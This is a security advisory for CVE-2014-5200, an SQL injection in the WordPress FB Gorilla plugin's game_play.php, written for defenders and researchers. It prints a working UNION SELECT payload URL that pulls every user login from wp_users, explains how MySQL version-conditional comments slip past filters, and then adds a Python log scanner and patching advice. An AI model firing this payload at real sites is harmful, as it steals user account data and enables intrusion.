WordPress FB Gorilla plugin 'game_play.php' SQL Injection Vulnerability
Release date:
Updated on:
Affected Systems:
WordPress FB Gorilla
Description:
--------------------------------------------------------------------------------
Bugtraq id: 69222
CVE (CAN) ID: CVE-2014-5200
The WordPress FB Gorilla plugin is an automated system for publishing content to Facebook fan pages.
In the FB Gorilla plugin for WordPress, game_play.php does not sanitize the 'id' request parameter before using it in a database query, so the query can be altered by the client (SQL injection). A remote attacker can exploit this by supplying a crafted 'id' value to execute arbitrary SQL commands against the site's database, for example to read the wp_users table.
Source: Amirh03in
Test method:
--------------------------------------------------------------------------------
Warning
The following procedure (method) may be offensive and is intended only for security research and teaching. Use at your own risk!
http://www.example.com/wp-content/plugins/fbgorilla/game_play.php?id=-7+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users--
The /*!50000...*/ wrappers are MySQL version-conditional comments: MySQL 5.0 and later executes their contents, while filters that treat /* ... */ as an ordinary comment never see the UNION and SELECT keywords inside. %28 and %29 are URL-encoded parentheses. The negative id makes the original query return no rows, the 13 values in the SELECT list match the column count of the plugin's original query, and group_concat(user_login) returns every WordPress user name in one field of the UNIONed row.
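As an added example (not part of the advisory and not code from the FB Gorilla plugin), the following Python script shows how to recognize this payload in web-server access logs: it normalizes the MySQL version-conditional comments the PoC uses to hide UNION and SELECT, and flags requests to game_play.php whose 'id' parameter is not a plain integer. The plugin path and the parameter name come from the advisory; the log lines are constructed for this example.

```python
"""Detect the game_play.php 'id' injection pattern in access logs.

Added example, not code from the FB Gorilla plugin or from the advisory.
The plugin path and the 'id' parameter come from the advisory; the log
lines below are constructed for this example.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

TARGET_PATH = "/wp-content/plugins/fbgorilla/game_play.php"

# MySQL executes the body of /*!NNNNN ... */ when the server version is
# >= NNNNN, so the PoC's /*!50000union*/ reaches the parser as UNION while a
# filter that treats /* ... */ as a comment never sees the keyword.
VERSION_COMMENT = re.compile(r"/\*!\d{5}\s*(.*?)\s*\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s+select\b")

# Apache/Nginx combined log format: client ip, timestamp and request line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize(value: str) -> str:
    """Decode the value the way MySQL will effectively see it.

    URL-decodes (twice, to catch double encoding), unwraps version
    comments keeping their body, drops ordinary comments, collapses
    whitespace and lowercases.
    """
    s = unquote_plus(unquote_plus(value))
    s = VERSION_COMMENT.sub(r" \1 ", s)
    s = PLAIN_COMMENT.sub(" ", s)
    return " ".join(s.split()).lower()


def analyze_id(raw_id: str) -> list[str]:
    """Return the reasons an 'id' value looks like SQL injection (empty = clean)."""
    reasons = []
    if not re.fullmatch(r"\s*-?\d+\s*", raw_id):
        reasons.append("id is not a plain integer")
    norm = normalize(raw_id)
    if UNION_SELECT.search(norm):
        reasons.append("UNION SELECT present after comment normalization")
    if re.search(r"\bwp_users\b|\bgroup_concat\s*\(", norm):
        reasons.append("references wp_users / group_concat")
    if norm.endswith("--") or "#" in norm:
        reasons.append("trailing SQL comment terminator")
    return reasons


def scan_log(text: str) -> list[dict]:
    """Return one finding per suspicious request to game_play.php."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["uri"])
        if parts.path != TARGET_PATH:
            continue
        # parse_qs already URL-decodes and turns '+' into spaces.
        for raw_id in parse_qs(parts.query, keep_blank_values=True).get("id", []):
            reasons = analyze_id(raw_id)
            if reasons:
                findings.append({
                    "ip": m["ip"], "ts": m["ts"], "id": raw_id,
                    "normalized": normalize(raw_id), "reasons": reasons,
                })
    return findings


# Constructed sample log: one benign request, the advisory's PoC, one unrelated hit.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Aug/2014:10:12:01 +0000] "GET /wp-content/plugins/fbgorilla/game_play.php?id=7 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [18/Aug/2014:10:12:07 +0000] "GET /wp-content/plugins/fbgorilla/game_play.php?id=-7+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users-- HTTP/1.1" 200 743 "-" "Mozilla/5.0"
198.51.100.2 - - [18/Aug/2014:10:13:00 +0000] "GET /index.php?p=12 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["ts"], f["reasons"])
        print("  normalized:", f["normalized"])
```

The integer check alone would already catch this PoC; the comment normalization is what keeps the rule useful when the keywords are wrapped in /*!50000...*/ or double-encoded, and the normalized string is what to record in the alert so an analyst sees the query the database actually received.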
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
WordPress
---------
At the time of writing the vendor has not provided a patch or upgrade. Users of this software are advised to follow the vendor's homepage to obtain the latest version:
http://fbgorilla.net/fb-gorilla-review/
Until a fixed version is available, site operators can reduce exposure by blocking direct requests to wp-content/plugins/fbgorilla/game_play.php at the web server or WAF and by monitoring access logs for non-numeric 'id' values on that path. The proper fix in the plugin is to cast the id to an integer or pass it through $wpdb->prepare() before it reaches the query.